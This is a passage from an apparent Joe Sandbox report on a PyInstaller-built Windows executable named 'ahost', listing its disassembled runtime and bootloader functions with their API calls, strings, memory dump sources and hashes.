FlsSetValue.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB37D
FlsSetValue.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB3AA
FlsSetValue.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB3BB
FlsSetValue.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB3CC
SetLastError.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB3E7

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
Instruction ID: 91b4b69916f986d88ed171446b9ea7620022922d002332079523abcbcc9a57ba
Opcode Fuzzy Hash: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
Instruction Fuzzy Hash: CE117C21F8C24A82FB687B216E5013DD1625F447B8FC44335EA3E467DEFE2CA44183A0

Function 00007FF7F91E2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7F91E1B6A), ref: 00007FF7F91E295E

Strings

%s: %s, xrefs: 00007FF7F91E29E8
Error, xrefs: 00007FF7F91E2A0E
[PYI-%d:ERROR] , xrefs: 00007FF7F91E2966
Error [ANSI Fallback], xrefs: 00007FF7F91E29FF

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: f0c64376cd51bc286dff7d1150b75cb81ac23d528f8595123487143df65275e4
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: E731C923F1868556F720BB61BC505EAA2A4BF887D4F800131EE6D8379DEF3CE546C650

Function 00007FF7F91E2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7F91E23C8
DialogBoxIndirectParamW.USER32 ref: 00007FF7F91E248E
DeleteObject.GDI32 ref: 00007FF7F91E24C1
DestroyIcon.USER32 ref: 00007FF7F91E24D3

Strings

Unhandled exception in script, xrefs: 00007FF7F91E23F8

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
Instruction ID: cde9648390806a3dbab9a3a180ee4fc0d4614f09e5cc568622a36302ccc22a9d
Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
Instruction Fuzzy Hash: 01314F72A096828AEB64BF21FC552F9A360FF88788F840135EA5D87A99DF3CD1058751

Function 00007FF7F91E2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7F91E918F,?,00007FF7F91E3C55), ref: 00007FF7F91E2BA0
MessageBoxW.USER32 ref: 00007FF7F91E2C2A

Strings

WARNING, xrefs: 00007FF7F91E2BAF
[PYI-%d:%ls] , xrefs: 00007FF7F91E2BA8
Warning, xrefs: 00007FF7F91E2C1D

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: 43b3f26000dfdfdebc77c898112c2a125ff82fc087ed68cdcf59092c872b7465
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: D221A372B08B4182E761AF14FC447AAA364EB88784F800135EE9D976A9DF3CE645C790

Function 00007FF7F91E2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7F91E1B99), ref: 00007FF7F91E2760

Strings

ERROR, xrefs: 00007FF7F91E276F
[PYI-%d:%s] , xrefs: 00007FF7F91E2768
Error, xrefs: 00007FF7F91E27DE
Error [ANSI Fallback], xrefs: 00007FF7F91E27CF

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: 69817d10e92a817c0bf8cdb982e81d33c021419ddd39aa274607591d2fc26bb9
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: FF219132A1878182E720EF50BC807EAA3A4AB88784F800131FE9D8369DDF3CE5458790

Function 00007FF7F91F9AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7F91F9B1D
GetProcAddress.KERNEL32 ref: 00007FF7F91F9B33
FreeLibrary.KERNEL32 ref: 00007FF7F91F9B5A

Strings

mscoree.dll, xrefs: 00007FF7F91F9B14
CorExitProcess, xrefs: 00007FF7F91F9B2C

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: 8acd96ae15b1f5222ef32223886f4f8e04bce91f8c5792a94d5de098dfeb807b
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: E1F04F61A0960681FF64AF24AC557799330AF85765F940235D67E865FCDF2CD08887A0

Function 00007FF7F92093D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7F9209400
_set_statfp.LIBCMT ref: 00007FF7F920941B
_set_statfp.LIBCMT ref: 00007FF7F9209437
_set_statfp.LIBCMT ref: 00007FF7F9209473

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: f0e261684316692b658090b94d62b5b04e2c0a62debf1f49f119fefb1cfc9640
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: C511BF6AE0CA1301F7D43924DC56375A0646F59370FC40634EBBF862FE8E2CA94941A1

Function 00007FF7F91FB400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB41F
FlsSetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB43E
FlsSetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB466
FlsSetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB477
FlsSetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB488

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
Instruction ID: 6d1cdb180982a9e06e76c52639da7bd5ebea41eadfa6d4c9bc6212ec23e341cf
Opcode Fuzzy Hash: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
Instruction Fuzzy Hash: 40116320E4960A81FB69BF217E5117DD1665F447B8FC84334DA3E467DEFE2CA44182A0

Function 00007FF7F91FB294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF7F91FB2A5
FlsSetValue.KERNEL32 ref: 00007FF7F91FB2C4
FlsSetValue.KERNEL32 ref: 00007FF7F91FB2EC
FlsSetValue.KERNEL32 ref: 00007FF7F91FB2FD
FlsSetValue.KERNEL32 ref: 00007FF7F91FB30E

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
Instruction ID: f73985c7d38c1c6319b02e53264c16cba8546c88ac09617218f9da3c9ea843eb
Opcode Fuzzy Hash: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
Instruction Fuzzy Hash: 8B110A10F8920E81FB697E227C5117D91625F45378FC84734DA3E4A3DAFD2CB84282A1

Function 00007FF7F91F6010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F6176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F622C

Strings

verbose, xrefs: 00007FF7F91F6020

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: d32c9600901c4d4e9433a50fa100dcd9001e431977c08f809decedeafcdc8d9d
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: D7919822E0C64D45EB61AE24EC5037DB6B9AB40BD8F844135DB7A473DDEE3CE4058391

Function 00007FF7F91FFC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91FFF17

Part of subcall function 00007FF7F91F7AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F7AC9

Strings

ccs, xrefs: 00007FF7F91FFE52
UTF-16LEUNICODE, xrefs: 00007FF7F91FFEB5
UTF-8, xrefs: 00007FF7F91FFE96

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: 64ce84591e8c3094fbaacc393b3e614ff5c2b413e64bd879d8eadf6881faf23c
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: B681D732D0824A85F7646E26AA10278B6B0AB1574CFD64035CB3D877CEFBADA501C3E1

Function 00007FF7F91ED6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7F91ED6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7F91ED77A
RtlUnwindEx.KERNEL32 ref: 00007FF7F91ED7D4

Strings

csm, xrefs: 00007FF7F91ED761

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: f805e30144cd7cbf740db8edbab2e0e6c09f88178d103c82a50ef867e4f99ef8
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: 5D51B33AE196098BDB54BF15E804A38A3A1EB44B98F944130DA6D477CCDF3CF845C791

Function 00007FF7F91EF2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7F91EF320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF7F91EF408

Strings

csm, xrefs: 00007FF7F91EF342
csm, xrefs: 00007FF7F91EF45A

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: b3f6f1b638aaccd5ce8becc5c48bb3e38bda516e9ef74176f2622eaf75cfd529
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: CF519F32E08282C7EB65BF22A844269B6B0EB54B84F944135EE6D477D9DF3CF450C792

Function 00007FF7F91EEF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF7F91EEFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF7F91EEFF3

Strings

MOC, xrefs: 00007FF7F91EEFBB
RCC, xrefs: 00007FF7F91EEFC3

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: 0d8095196bdf8dbe1c43056937eb0c7cceaeb45b9e331465f7b1be3da733880d
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: 89617E32908BC582E761AF15F8403AAB7A0FB85784F444235EEAD07B99DF7CE190CB51

Function 00007FF7F91E7E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF7F91E352C,?,00000000,00007FF7F91E3F23), ref: 00007FF7F91E7F22

Strings

%s%c, xrefs: 00007FF7F91E7E94
\, xrefs: 00007FF7F91E7E87
%.*s, xrefs: 00007FF7F91E7EDB

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
Instruction ID: 6f33d833fc90ad13cea2cb3459704e069f6d2a3b83292f2d4f268280d8a8b92b
Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
Instruction Fuzzy Hash: 9031B721A19AC146FB21BF10FC507AAA264EF84BE4F840230EE7D437CDDE2CE5058751

Function 00007FF7F91E2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF7F91E28EA

Strings

Error, xrefs: 00007FF7F91E28DD
[PYI-%d:%ls] , xrefs: 00007FF7F91E2868
ERROR, xrefs: 00007FF7F91E286F

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: 4b4a09f05e78ba501f7d2422704cfab75b00c64a95ffc9e326fc8146ff0b2a02
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: 8421A672B08B4182E760AF14FC447EAA364EB88784F800135EE9D936A9DF3CD645C790

Function 00007FF7F91FC610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF7F91FC68F
WriteFile.KERNEL32 ref: 00007FF7F91FC957
WriteFile.KERNEL32 ref: 00007FF7F91FC99D
GetLastError.KERNEL32 ref: 00007FF7F91FCA53

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

